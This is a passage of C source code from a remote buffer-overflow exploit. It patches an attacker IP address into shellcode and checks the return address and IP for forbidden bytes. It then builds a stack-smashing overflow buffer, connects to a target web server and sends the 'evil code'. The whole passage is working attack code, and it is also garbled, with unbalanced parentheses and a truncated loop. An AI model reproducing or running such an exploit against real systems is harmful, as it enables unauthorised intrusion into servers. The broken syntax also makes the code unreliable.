/* Think of this as a strange value? Think of the shellcode alignment */ sip ^= 0x1192011e; /* Check if the given RETADDY won‘t ruin our payload */ if(ICinInt(retaddy, FORBIDDEN, sizeof(FORBIDDEN)-1)) { printf("Error: Found illegal character in return address\n"; exit(0); } /* Check if the given IP won‘t ruin our shellcode */ if(ICinInt(sip, FORBIDDEN, sizeof(FORBIDDEN)-1)) { printf("Error: Found illegal character in IP address\n"; exit(0); } /* Locate the IP position in the shellcode */ iploc=(char *)strchr(hellcode, 0xAA); memcpy((void *) iploc, (void *) &sip, 4); evilcode = buildOverflow(retaddy, align); sd = wwwconnect(dip); printf("Connected to %s\n", argv[1]); printf("Proceeding to send evil code...\n"; send(sd, evilcode, strlen(evilcode), 0); printf("Sent!\n"; return(0); } char *buildOverflow(unsigned long retaddy, unsigned int align) { char source[SZ_SOURCEBUF]; char *smash, *output; int c; smash = (char *)xmalloc(SZ_FILEBUF+align+1); output = (char *)xmalloc(SZ_SOURCEBUF+SZ_FILEBUF+align+1); for(c=0;c source[253] = 0xeb; /* Jump over few bytes between arrays on stack */ source[254] = 0x08; source[255] = 0x00; /* Directory and Sourcename follow each other on stack closely